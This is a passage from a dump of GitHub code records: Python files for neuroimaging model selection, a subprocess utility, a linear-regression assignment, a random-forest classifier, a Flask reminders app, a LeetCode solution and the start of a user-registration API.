np.asarray(data.a).round(5)\n data = data[data.k == -1]\n data = data[data.l1l2_ratio.isin([0, 0.01, 0.1, 0.5, 0.9, 1.])]\n data = data[(data.tv >= 0.1) | (data.tv == 0)]\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n assert np.sum(data.l1l2_ratio == 0.01) == np.sum(close(data.l1l2_ratio, 0.01))\n #data = data[data.a <= 1]\n # for each a, l1l2_ratio, append the last point tv==1\n last = list()\n for a_ in np.unique(data.a):\n full_tv = data[(data.a == a_) & (data.tv == 1)]\n for l1l2_ratio in np.unique(data.l1l2_ratio):\n new = full_tv.copy()\n new.l1l2_ratio = l1l2_ratio\n last.append(new)\n #\n last = pd.concat(last)\n data = pd.concat([data, last])\n data.drop_duplicates(inplace=True)\n #\n from brainomics.plot_utilities import plot_lines\n figures = plot_lines(df=data,\n x_col=x_col, y_col=y_col, colorby_col='l1l2_ratio',\n splitby_col='a', color_map=color_map)\n pdf = PdfPages(outut_filename)\n for fig in figures:\n print(fig, figures[fig])\n pdf.savefig(figures[fig]); plt.clf()\n pdf.close()\n\ndef build_summary_2015():\n import pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n from collections import OrderedDict\n models = OrderedDict()\n models[\"l2\"] = (0.010,\t0.000, 1.000, 0.000)\n models[\"l2tv\"] = (0.010,\t0.000, 0.500, 0.500)\n models[\"l1\"] = (0.010,\t1.000, 0.000, 0.000)\n models[\"l1tv\"] = (0.010,\t0.500, 0.000, 0.500)\n models[\"tv\"] = (0.010,\t0.000, 0.000, 1.000)\n models[\"l1l2\"] = (0.010,\t0.500, 0.500, 0.000)\n 
models[\"l1l2tv\"] = (0.010,\t0.350, 0.350, 0.300)\n models[\"l1sl2\"] = (0.010,\t0.1, 0.9, 0.000)\n models[\"l1sl2tv\"] = (0.010,\t0.1 * (1-.3), 0.9*(1-.3), 0.300)\n\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n orig_cv = pd.read_csv(config['reduce_output'])\n cv = orig_cv[[\"k\", \"a\", \"l1\", \"l2\", \"tv\", 'recall_0', u'recall_1', u'recall_mean',\n 'auc', \"beta_r_bar\", 'beta_fleiss_kappa']]\n summary = list()\n for k in models:\n #k = \"l2\" k=\"l1sl2\"\n a, l1, l2, tv = models[k]\n l = cv[(cv.k == -1) & close(cv.a, a) & close(cv.l1, l1) & close(cv.l2, l2) & close(cv.tv, tv)]\n assert l.shape[0] == 1\n l[\"algo\"] = k\n summary.append(l)\n summary = pd.concat(summary)\n summary.drop(\"k\", 1, inplace=True)\n cols_diff_in = [\"recall_mean\", \"auc\", \"beta_r_bar\", \"beta_fleiss_kappa\"]\n cols_diff = [\"delta_\"+ c for c in cols_diff_in]\n for c in cols_diff:\n summary[c] = None\n delta = summary.ix[summary.algo == \"l2tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l2tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"l1tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l1\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l1tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"l1l2tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l1l2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l1l2tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"tv\", cols_diff] = delta\n delta = summary.ix[summary.algo == \"l1sl2tv\", cols_diff_in].as_matrix() - summary.ix[summary.algo == \"l1sl2\", cols_diff_in].as_matrix()\n summary.ix[summary.algo == \"l1sl2tv\", cols_diff] = delta\n xlsx = pd.ExcelWriter(config['reduce_output'].replace(\"csv\" , \"xlsx\"))\n orig_cv.to_excel(xlsx, 'All')\n summary.to_excel(xlsx, 'Summary')\n xlsx.save()\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-i', '--init', action='store_true', default=False,\n help=\"Init config file & sync to cluster\")\n\n parser.add_argument('-r', '--reduce', action='store_true', default=False,\n help=\"Reduce, ie.: compute scores\")\n\n options = parser.parse_args()\n\n if options.init:\n init()\n\n elif options.reduce:\n reducer()","repo_name":"neurospin/scripts","sub_path":"2013_adni/MCIc-CTL-FS/03_tvenet_modselectcv_cs.py","file_name":"03_tvenet_modselectcv_cs.py","file_ext":"py","file_size_in_byte":59034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"24817081377","text":"import platform\nimport subprocess\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Union, Optional\n\nimport core.enums\n\n\ndef get_abs_path(path_: Union[str, Path]) -> Path:\n return Path(str(path_)).expanduser().resolve().absolute()\n\n\n@dataclass\nclass FinishedProcess:\n command: str\n work_dir: str\n process: 'subprocess.Popen'\n stdout: str\n stderr: Optional[str]\n\n\ndef spawn_and_communicate_with_subprocess(\n command: str,\n work_dir: Union[str, Path],\n return_error: bool = True,\n with_shell: bool = False,\n _encoding: str = 'utf-8',\n _errors: str = 'ignore',\n) -> FinishedProcess:\n work_dir = str(work_dir)\n with subprocess.Popen(\n command,\n stdout=subprocess.PIPE,\n 
stderr=subprocess.PIPE,\n cwd=work_dir,\n shell=with_shell,\n ) as process:\n output, error = process.communicate()\n\n _output = output.decode(_encoding, _errors)\n _error = error.decode(_encoding, _errors)\n\n if not process.returncode or return_error:\n return FinishedProcess(command, work_dir, process, _output, _error)\n\n raise RuntimeError(\n f'{command} at {work_dir} caused the following error:\\n'\n f'{error}\\n'\n f'Return code: {process.returncode}'\n )\n\n\ndef get_current_os() -> 'core.enums.PlatformVersion':\n \"\"\"\n\n :return: Tries to return an enum representing the current os.\n Supported OSes are:\n * Windows\n * Linux\n * Mac (Darwin)\n\n :rtype: core.enums.PlatformVersion\n \"\"\"\n current_os = platform.system()\n try:\n return core.enums.PlatformVersion(current_os)\n except ValueError as err:\n # noinspection PyUnresolvedReferences\n supported_oses: list[str] = [p.value for p in core.enums.PlatformVersion]\n raise OSError(\n f'Unsupported system: {current_os}\\n'\n f'Supported systems are: {\", \".join(supported_oses)}'\n ) from err\n","repo_name":"DobroAlex/laolab-nmap-test","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14159524645","text":"# CS121 Linear regression\n#\n# Kristen Witte, kwitte\n\nimport numpy as np\nfrom asserts import assert_Xy, assert_Xbeta\n\n\n#############################\n# #\n# Our code: DO NOT MODIFY #\n# #\n#############################\n\n\ndef prepend_ones_column(A):\n '''\n Add a ones column to the left side of an array\n\n Inputs: \n A: a numpy array\n\n Output: a numpy array\n '''\n ones_col = np.ones((A.shape[0], 1))\n return np.hstack([ones_col, A])\n\n\ndef linear_regression(X, y):\n '''\n Compute linear regression. Finds model, beta, that minimizes\n X*beta - Y in a least squared sense.\n\n Accepts inputs with type array\n Returns beta, which is used only by apply_beta\n\n Examples\n --------\n >>> X = np.array([[5, 2], [3, 2], [6, 2.1], [7, 3]]) # predictors\n >>> y = np.array([5, 2, 6, 6]) # dependent\n >>> beta = linear_regression(X, y) # compute the coefficients\n >>> beta\n array([ 1.20104895, 1.41083916, -1.6958042 ])\n >>> apply_beta(beta, X) # apply the function defined by beta\n array([ 4.86363636, 2.04195804, 6.1048951 , 5.98951049])\n '''\n assert_Xy(X, y, fname='linear_regression')\n\n X_with_ones = prepend_ones_column(X)\n\n # Do actual computation\n beta = np.linalg.lstsq(X_with_ones, y)[0]\n\n return beta\n\n\ndef apply_beta(beta, X):\n '''\n Apply beta, the function generated by linear_regression, to the\n specified values\n\n Inputs:\n model: beta as returned by linear_regression\n Xs: 2D array of floats\n\n Returns:\n result of applying beta to the data, as an array.\n\n Given:\n beta = array([B0, B1, B2,...BK])\n Xs = array([[x11, x12, ..., x0K],\n [x21, x22, ..., x1K],\n ...\n [xN1, xN2, ..., xNK]])\n\n result will be:\n array([B0+B1*x11+B2*x12+...+BK*x1K,\n B0+B1*x21+B2*x22+...+BK*x2K,\n ...\n B0+B1*xN1+B2*xN2+...+BK*xNK])\n '''\n assert_Xbeta(X, beta, fname='apply_beta')\n\n # Add a column of ones\n X_incl_ones = prepend_ones_column(X)\n\n # Calculate X*beta\n yhat = np.dot(X_incl_ones, beta)\n return yhat\n\n\ndef read_file(filename):\n '''\n Read data from the specified file. Split the lines and convert\n float strings into floats. 
Assumes the first row contains labels\n for the columns.\n\n Inputs:\n filename: name of the file to be read\n\n Returns:\n (list of strings, 2D array)\n '''\n with open(filename) as f:\n labels = f.readline().strip().split(',')\n data = np.loadtxt(f, delimiter=',', dtype=np.float64)\n return labels, data\n\n\n###############\n# #\n# Your code #\n# #\n###############\n\ndef calculate_R2(curr_yhats, y_test, y_mean):\n '''\n Compute the R2 value for given data\n\n Inputs:\n curr_yhats = numpy array derived from apply_beta\n y_test: numpy array for the dependent variable. Either from \n training.csv or testing.csv depending on find_R2\n y_mean: average of y* derived from either training.csv \n or testing.csv depending on find_R2 \n\n Returns:\n r2: R^2 value as a float\n '''\n\n numerator = []\n denominator = []\n\n for i, yn in enumerate(y_test):\n yhat = curr_yhats[i]\n top = (yn - yhat)**2\n bottom = (yn - y_mean)**2\n numerator.append(top)\n denominator.append(bottom)\n\n sum_numerator = sum(numerator)\n sum_denominator = sum(denominator)\n r2 = 1 - (sum_numerator/sum_denominator)\n\n return r2\n\ndef find_R2(x_train, y_train, y_mean, x_test = None, y_test = None):\n '''\n Find the R2 value for given data using linear_regression and apply_beta\n\n Inputs:\n x_train: independent variable data from training.csv\n y_train: dependent variab data from training.csv\n y_mean: average of y* (default from training.csv or if \n x_test is not None, testing.csv)\n Optional Inputs:\n x_test: independent variable data from testing.csv\n y_test: dependent variab data from testing.csv\n\n Returns:\n r2: R^2 value as a float\n '''\n\n if x_test is not None:\n beta = linear_regression(x_train, y_train)\n yhats = apply_beta(beta, x_test)\n r2 = calculate_R2(yhats, y_test, y_mean)\n else:\n beta = linear_regression(x_train, y_train)\n yhats = apply_beta(beta, x_train)\n r2 = calculate_R2(yhats, y_train, y_mean)\n return r2\n\ndef build_K_arrays(dex, cat, temp_arrays, r2s, base_category, remaining,\n base_num_rows, y_train, y_mean, temp_train_data = None, y_test = None):\n '''\n Builds numpy arrays of K categories. 
Used in a for loop in\n get_R2 \"Arbitrary\"\n\n Inputs:\n dex: current index\n cat: current category\n temp_arrays: empty dictionary to store numpy arrays for K categories\n r2s: empty dicitonary to store R2s for K categories\n base_category: numpy array for K = 1\n remaing: numpy array for the reamining data after removing \n base_category data\n base_num_rows: numer of rows in base_category\n y_train: numpy array for the y data from training.csv\n y_mean: average of the y values for either the training.csv\n or the testing.csv (if y_test is not None)\n Optional inputs:\n temp_train_data: dictionary storing the training numpy array\n for K categories\n y_test: numpy array for the y data from testing.csv\n\n Returns:\n r2s: filled dictionary of R2s for K categories\n temp_arrays: filled dictionary of numpy arrays for K categories\n If y_test is None:\n temp_data: numpy array for K categories (solely for training data)\n '''\n\n temp_data = np.empty([base_num_rows, 0])\n temp_data = np.append(temp_data, \n base_category, axis = 1)\n additional_category = remaining[:,[dex]]\n temp_data = np.append(temp_data, \n additional_category, axis = 1)\n temp_arrays[cat] = temp_data\n\n if y_test is None:\n r2 = find_R2(temp_data, y_train, y_mean)\n else:\n r2 = find_R2(temp_train_data, y_train, y_mean, temp_data, y_test)\n \n r2s[cat] = r2\n\n if y_test is None:\n return r2s, temp_arrays, temp_data\n else:\n return r2s, temp_arrays\n\n\ndef ratio_less_than_threshold(all_variables, compiled_data, threshold):\n '''\n Determines if the increase in K R^2 from K-1 R^2 is greater than threshold\n\n Inputs:\n all_variables: a list of all the current column categories\n compiled_data: dictionary of the categories and their R^2 values\n threshold: float\n\n Returns:\n Boolean\n If Boolean is True, also returns the K-1 category\n '''\n\n assert len(list(compiled_data.keys())) >= 2\n assert threshold is not None\n\n k_categories = ','.join(all_variables)\n k_1_variables = all_variables[:-1]\n k_subtract_1_categories = ','.join(k_1_variables)\n\n k_r2 = compiled_data[k_categories]\n k_subtract_1_r2 = compiled_data[k_subtract_1_categories]\n\n percent_increase = (k_r2/k_subtract_1_r2) - 1\n\n if percent_increase < threshold:\n return True, k_subtract_1_categories\n else:\n return False, None\n\n\ndef get_R2(col_names, data_train, num_vars, data_test = None, \n threshold = None):\n '''\n Returns the R2 squared value(s) using linear regression\n\n Inputs:\n col_names: a list of the column names from the read in data_test\n data_train: a numpy array of the data from training.csv \n num_vars: string indicating amount of data to include \n in the linear regression\n Options:\"Single\": R^2 value for each column \n \"Multi\": R^2 value for all columns\n \"BiVar\": R^2 value for pairs of columns\n \"Arbitrary\": R^2 value for K columns\n Optional Inputs:\n *Only used when num_vars is \"Arbitrary\"*\n data_test: a numpy array of the data from testing.csv\n threshold: minimum percent that R^2 must increase by with\n increasing K\n\n Returns:\n Options:\"Single\": a list of the R^2 values \n \"Multi\": a list of the R^2 value (single element)\n \"BiVar\": two single element lists. One of the Category \n pair with the highest R^2. 
One of the R^2 value\n for that pair.\n \"Arbitrary\": a dictionary of 1 <= K <= N categories and \n the corresponding R^2 value for K.\n If threshold is not None: a second dictionary with the \n K-1 categories and the corresponding R^2 value such that\n the percent increase of K R^2 to K-1 R^2 is less than\n threshold.\n '''\n\n total_cols = len(col_names)\n y_train = data_train[:, (total_cols - 1)]\n all_training = data_train[: , 0:total_cols - 1]\n\n y_mean = (y_train.sum()/len(y_train))\n \n if data_test is not None:\n y_test = data_test[:, (total_cols - 1)]\n all_test = data_test[: , 0:total_cols - 1]\n y_mean = (y_test.sum()/len(y_test))\n \n num_categories = total_cols - 1\n\n r2_values = []\n\n if num_vars == \"Single\":\n for i in range(num_categories):\n curr_train_category = all_training[:,[i]] \n if data_test is not None:\n curr_test_category = all_test[:,[i]]\n r2 = find_R2(curr_train_category, y_train, \n y_mean, curr_test_category, y_test)\n else: r2 = find_R2(curr_train_category, y_train, \n y_mean)\n r2_values.append(r2)\n return r2_values\n \n elif num_vars == \"Multi\":\n r2 = find_R2(all_training, y_train, y_mean)\n r2_values.append(r2)\n return r2_values\n \n elif num_vars == \"BiVar\":\n paired_r2 = {}\n for i in range(num_categories):\n base_category = all_training[:,[i]]\n for j in range(i+1, num_categories):\n paired_category = all_training[:,[j]]\n bivar_data = np.concatenate((base_category, \n paired_category), axis = 1)\n r2 = find_R2(bivar_data, y_train, y_mean)\n pair = col_names[i] + \":\" + col_names[j]\n paired_r2[pair] = r2\n\n highest_r2 = 0\n for pair in paired_r2:\n r2 = paired_r2[pair]\n if r2 >= highest_r2:\n highest_r2 = r2\n highest_pair = [pair]\n\n r2_values.append(highest_r2)\n\n return highest_pair, r2_values\n\n elif num_vars == \"Arbitrary\":\n\n compiled_data = {}\n\n if data_test is not None:\n single_test_r2s = get_R2(col_names, data_train, \n \"Single\", data_test)\n \n single_r2s = get_R2(col_names, data_train, \"Single\")\n highest_r2 = 0\n for i, r2 in enumerate(single_r2s):\n if r2 >= highest_r2:\n highest_r2 = r2\n highest_category = col_names[i]\n index_highest_category = i\n \n all_variables = [highest_category]\n category_names = highest_category\n \n if data_test is not None:\n compiled_data[category_names] = single_test_r2s[index_highest_category]\n else:\n compiled_data[category_names] = single_r2s[index_highest_category]\n\n base_train_category = all_training[:,[index_highest_category]]\n base_train_rows = len(base_train_category)\n if data_test is not None:\n base_test_category = all_test[:,[index_highest_category]]\n base_test_rows = len(base_test_category)\n\n remaining_training = np.delete(all_training, \n [index_highest_category], axis = 1)\n if data_test is not None:\n remaining_test = np.delete(all_test, \n [index_highest_category], axis = 1)\n\n remaining_cols = [x for x in col_names if x != highest_category]\n remaining_cols.pop() #remove the totals column\n num_remaining = len(remaining_cols)\n \n best = {} #for thresholding\n\n for i in range(num_remaining):\n temp_train_arrays = {} #temp arrays\n temp_test_arrays = {}\n train_r2s = {} #r2s\n test_r2s = {}\n for j, category in enumerate(remaining_cols):\n if category not in all_variables:\n train_r2s, temp_train_arrays, temp_train_data = build_K_arrays(j,\n category, temp_train_arrays, train_r2s, base_train_category,\n remaining_training, base_train_rows, y_train, y_mean)\n \n if data_test is not None:\n test_r2s, temp_test_arrays = build_K_arrays(j, category, \n 
temp_test_arrays, test_r2s, base_test_category, remaining_test,\n base_test_rows, y_train, y_mean, temp_train_data, y_test)\n \n highest_r2 = 0\n for category in train_r2s:\n current_r2 = train_r2s[category]\n if current_r2 >= highest_r2:\n highest_r2 = current_r2\n highest_category = category #From the train data\n base_train_category = temp_train_arrays[highest_category]\n if data_test is not None:\n base_test_category = temp_test_arrays[highest_category]\n\n all_variables.append(highest_category)\n\n category_names = ','.join(all_variables)\n if data_test is not None:\n compiled_data[category_names] = test_r2s[highest_category]\n else:\n compiled_data[category_names] = train_r2s[highest_category]\n if threshold != None:\n x, final_key = ratio_less_than_threshold(all_variables, \n compiled_data, threshold)\n\n if not best:\n if x:\n best[final_key] = compiled_data[final_key]\n \n if threshold != None:\n return compiled_data, best\n return compiled_data\n\n\ndef print_dict_data(d):\n '''\n Prints out the info from a dictionary in an easy to read format\n\n Inputs:\n d: dictionary\n\n Returns:\n prints out data from dictionary.\n '''\n\n for key in d:\n print(key + \" : \" + str(d[key]))\n\n\ndef make_table(r2_values, names):\n '''\n Makes a table for the provided r2_values and the k_categories\n\n Inputs:\n r2_values: list of R2 values\n names: list of names\n **indices of names and r2_values must match\n\n Returns:\n prints out a nicely formatted table.\n '''\n\n COLUMN_WIDTH = 18\n COLUMN_SEP = \"|\" \n\n names.insert(0, \"Category\")\n r2_values.insert(0, \"R2\")\n\n table = []\n for i, name in enumerate(names):\n insert = []\n insert = make_column(name, insert, COLUMN_WIDTH, COLUMN_SEP)\n insert = make_column(r2_values[i], insert, COLUMN_WIDTH, COLUMN_SEP)\n insert.append('\\n')\n table.append(insert)\n\n for row in table:\n line = ''.join(row)\n print(line)\n\n\ndef make_column(current_input, insert, COLUMN_WIDTH, COLUMN_SEP):\n '''\n Makes a column insert for table\n\n Inputs:\n current_input: a the category name or r2 values\n insert: an empty list\n COLUMN_WIDTH: integer\n COLUMN_SEP: string\n\n Returns:\n insert: a single element list. 
\n Element is the string for that column\n '''\n\n inp = current_input\n t = type(inp)\n if t == np.float64 or t == int:\n inp = str(inp)\n curr_characters = len(inp)\n space = [' ']\n diff = COLUMN_WIDTH - curr_characters\n if diff < 0:\n num_characters = abs(diff+1)\n inp = inp[:diff]\n else:\n while len(space) < diff:\n space.append(' ')\n spaces = ''.join(space)\n insert.append(inp)\n insert.append(spaces)\n insert.append(COLUMN_SEP)\n\n return insert\n","repo_name":"kwitte2232/CS121","sub_path":"pa6/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4190333541","text":"\n# coding: utf-8\n\n## Import libraries and modules\nimport numpy as np\nimport pandas as pd\nimport pprint\n\nfrom sklearn import pipeline\nfrom sklearn import preprocessing\nfrom sklearn import feature_selection\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.externals import joblib \n\n##Load the data.\ndata = pd.read_csv(filepath_or_buffer='./classify.csv', sep=' ', header=None)\n#print data.head()\n#print data.shape\n\n## Drop the last column\ndata.drop(labels=data.columns[len(data.columns)-1], axis=1, inplace=True)\n#print data.head()\n\n## Split data into feature-matrix and the target-vector\ny = data.iloc[:,0]\nX = data.iloc[:, 1:len(data.columns)]\n\n## Make pipeline using data preprocessing step, best k-features selection step and classifier algo step\npipe = pipeline.Pipeline([('scaler', preprocessing.StandardScaler()), \n ('selectkbest', feature_selection.SelectKBest()),\n ('randomforestclassifier', RandomForestClassifier(random_state=222))])\n#print pipeline.get_params()\n\n## Random Forest Classifier without prunning:\n## Declare default hyperparameters to tune i.e. 
giving the default values as it is\ndefaulat_hyperparam = {'selectkbest__k':[17]} # selecting all the features in the default no-prun run\n\n## Create model without pruning using cross-validation pipeline\nno_prune_clf = GridSearchCV(estimator=pipe, param_grid=defaulat_hyperparam, scoring=\"f1\", cv=10)\nno_prune_clf.fit(X, y)\n\n## Refit on the entire training set\n# No additional code needed if no_prune_clf.refit == True (default is True)\n\n## Feature-selection scores\nfeatures = no_prune_clf.best_estimator_.named_steps['selectkbest']\nprint(\"\\n******** Random-Forest Classifier: No pruning: All features\")\nprint(\"The feature selection scores(ANOVA F-value between label/feature) are as follows:\")\nprint(\"Feature Score \")\nfor itr in range(X.shape[1]):\n print((str(itr+1) +\" \"+str(features.scores_[itr])))\n\n## F1 score for Classifier without pruning:\nprint(\"\\n******** Random-Forest Classifier: No pruning: All features: 10-fold Cross-Validation results: \")\npprint.pprint(no_prune_clf.cv_results_)\n\nprint(\"******** Random-Forest Classifier: No pruning: All features: F1-score of the best estimator: \", no_prune_clf.best_score_)\n\n##Save model for future use\njoblib.dump(no_prune_clf, 'no_prune_clf.pkl')\n# To load: no_prune_clf = joblib.load('no_prune_clf.pkl')\n\n# Random Forest Classifier with prunning:\n## Declare hyperparameters for prunning\npruning_hyperparam = { 'selectkbest__k':[12]\n #randomforestclassifier__n_estimators' : [10]\n #,randomforestclassifier__max_features' : ['sqrt']\n ,'randomforestclassifier__min_samples_leaf' : [2]\n ,'randomforestclassifier__min_samples_split' : [4]\n }\n\n## Create model with pruning using cross-validation pipeline\npruned_clf = GridSearchCV(estimator=pipe, param_grid=pruning_hyperparam, scoring=\"f1\", cv=10)\npruned_clf.fit(X, y)\n\n## F1 score for Classifier with pruning:\nprint(\"\\n******** Random-Forest Classifier: With pruning : Pruning parameters are set as follows:\")\nprint(\"Number of best features to be considered (out of 17): 12\")\nprint(\"min_samples_leaf(The minimum number of samples required to be at a leaf node): 2 \")\nprint(\"min_samples_split(The minimum number of samples required to split an internal node): 4 \")\n\nprint(\"\\n******** Random-Forest Classifier: With pruning : 10-fold Cross-Validation results: \")\npprint.pprint(pruned_clf.cv_results_)\n\nprint(\"\\n******** Random-Forest Classifier: With pruning : F1-score of the best estimator: \", pruned_clf.best_score_)\n\n#Save model for future use\njoblib.dump(pruned_clf, 'pruned_clf.pkl');\n# To load: pruned_clf = joblib.load('pruned_clf.pkl')\n\n","repo_name":"sangramga/AdvancedPython","sub_path":"RF_Classify_ToBeSubmitted.py","file_name":"RF_Classify_ToBeSubmitted.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4426052951","text":"from os import abort\nfrom flask import Flask, render_template, request\nimport sqlite3\n\napp = Flask(__name__)\nnext_id = 1\nreminders = {}\n\ndef get_db_connection():\n conn = sqlite3.connect('web_reminders.db')\n conn.row_factory = sqlite3.Row\n return conn\n\ndef create_table(): \n conn = get_db_connection()\n cursor = conn.cursor()\n\n cursor.execute('''CREATE TABLE IF NOT EXISTS reminders (\n id INTEGER PRIMARY KEY,\n title TEXT NOT NULL,\n content TEXT NOT NULL,\n priority INTEGER NOT NULL\n )''')\n\n conn.commit()\n conn.close()\n\ncreate_table()\n\ndef delete_reminder(reminder_id):\n conn = 
get_db_connection()\n cursor = conn.cursor()\n\n cursor.execute(\"DELETE FROM reminders WHERE id=?\", (reminder_id,))\n\n conn.commit()\n conn.close()\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/addReminder')\ndef add():\n return render_template('addReminder.html')\n\n@app.route('/updateReminder')\ndef upd():\n return render_template('updateReminder.html')\n\n@app.route('/showReminder', methods=['POST'])\ndef save_reminder():\n name = request.form['name']\n content = request.form['content']\n priority = int(request.form['priority']) \n\n conn = get_db_connection()\n cursor = conn.cursor()\n\n cursor.execute(\"INSERT INTO reminders (title, content, priority) VALUES (?, ?, ?)\",\n (name, content, priority))\n\n conn.commit()\n conn.close()\n\n reminder = {\n 'title': name,\n 'content': content,\n 'priority': priority,\n }\n\n return render_template('showReminder.html', reminder=reminder)\n\n@app.route('/allReminders')\ndef show_all_reminders():\n page = request.args.get('page', 1, type=int)\n per_page = 5\n\n conn = get_db_connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT COUNT(*) FROM reminders\")\n total_reminders = cursor.fetchone()[0]\n total_pages = (total_reminders + per_page - 1) // per_page\n\n if page < 1 or page > total_pages:\n abort(404)\n\n offset = (page - 1) * per_page\n cursor.execute(\"SELECT * FROM reminders LIMIT ? OFFSET ?\", (per_page, offset))\n reminders = cursor.fetchall()\n conn.close()\n\n return render_template('allReminders.html', reminders=reminders, page=page, total_pages=total_pages)\n\n@app.route('/deleteReminder/<int:reminder_id>', methods=['POST'])\ndef delete_single_reminder(reminder_id):\n delete_reminder(reminder_id)\n return render_template('deletedReminder.html', reminder_id=reminder_id)\n\n@app.route('/updateReminder/<int:reminder_id>', methods=['GET', 'POST'])\ndef update_reminder(reminder_id):\n conn = get_db_connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM reminders WHERE id=?\", (reminder_id,))\n reminder = cursor.fetchone()\n\n if not reminder:\n abort(404)\n\n if request.method == 'POST':\n try:\n title = request.form['title']\n content = request.form['content']\n priority = int(request.form['priority'])\n\n cursor.execute(\"UPDATE reminders SET title=?, content=?, priority=? WHERE id=?\",\n (title, content, priority, reminder_id))\n\n conn.commit()\n\n cursor.execute(\"SELECT * FROM reminders WHERE id=?\", (reminder_id,))\n updated_reminder = cursor.fetchone()\n\n conn.close()\n\n return render_template('showReminder.html', reminder=updated_reminder)\n\n except KeyError:\n message = \"Incomplete form data. 
Please provide all required fields.\"\n return render_template('updateReminder.html', reminder=reminder, error_message=message)\n\n conn.close()\n return render_template('updateReminder.html', reminder=reminder)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"marko-teovanovic/WebApp_Reminder","sub_path":"Reminder.py","file_name":"Reminder.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18047750090","text":"class Solution:\n def findDuplicate(self, nums: List[int]) -> int:\n start, end = 0, len(nums) - 1\n ans = 0\n while start <= end:\n mid = start + (end-start) // 2\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count <= mid:\n start = mid + 1\n else:\n ans = mid\n end = mid - 1\n \n return ans\n \n # negative marking - violates the constraints but it is faster and real interesting\n # for i in range(len(nums)):\n # if nums[abs(nums[i])] < 0:\n # ans = abs(nums[i])\n # break\n # nums[abs(nums[i])] = -nums[abs(nums[i])]\n \n # for i in range(len(nums)):\n # nums[i] = abs(nums[i])\n \n # return ans\n","repo_name":"Mussie7/A2SV-community-questions-answer-codes","sub_path":"new converts ramp up/find the duplicate number.py","file_name":"find the duplicate number.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16114530487","text":"from models.db_models.models import Users, UserLogins, UserInfo,Clients,ClientInfo,UserConfirmationCodes,UserFavoriteProducts\nfrom db.db import session\nfrom flask import Flask, jsonify, request\nfrom flask_restful import Resource, fields, marshal_with, abort, reqparse\nimport modules.db_model_tranformer_modules.db_model_transformer_module as db_transformer\nimport datetime\nimport base64\nimport modules.http.send_sms_module as sms_sender\n# PARAMS\nENTITY_NAME = \"Quick User Registration\"\n# MODEL = Users\nROUTE = \"/quickUserRegistration\"\nEND_POINT = \"quick-user-registration\"\n\n# NESTED SCHEMA FIELDS\navatar_data_fields = {\n 'id': fields.Integer,\n 'original_file_name': fields.String,\n 'file_path': fields.String,\n 'file_size': fields.Integer,\n 'uid': fields.String,\n 'user_creator_id': fields.Integer,\n 'upload_date': fields.DateTime,\n 'thumb_file_path': fields.String,\n 'optimized_size_file_path': fields.String\n}\nuser_info_data = {\n \"id\":fields.Integer,\n \"user_id\":fields.Integer,\n \"email\":fields.String,\n \"phone_number\":fields.String,\n \"birthday\":fields.String,\n 'avatar_id':fields.Integer,\n 'avatar_data':fields.Nested(avatar_data_fields)\n}\n\nuser_role_data = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'title': fields.String,\n\n}\n\nuser_client_data = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'registration_number': fields.String\n}\n\nuser_login_data = {\n 'id': fields.Integer,\n 'login': fields.String,\n 'last_login_date': fields.DateTime\n}\n\nuser_confirmation_code_fields ={\n 'id':fields.Integer,\n 'code':fields.String\n}\n\nuser_favorites_products_fields ={\n 'id':fields.Integer,\n 'products_ids':fields.List(fields.Integer)\n}\n\n\n# OUTPUT SCHEMA\noutput_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'lock_state': fields.Boolean,\n 'client_data': fields.Nested(user_client_data),\n 'user_role_data': fields.Nested(user_role_data),\n 'user_login': fields.Nested(user_login_data),\n 'user_info_data':fields.Nested(user_info_data),\n 
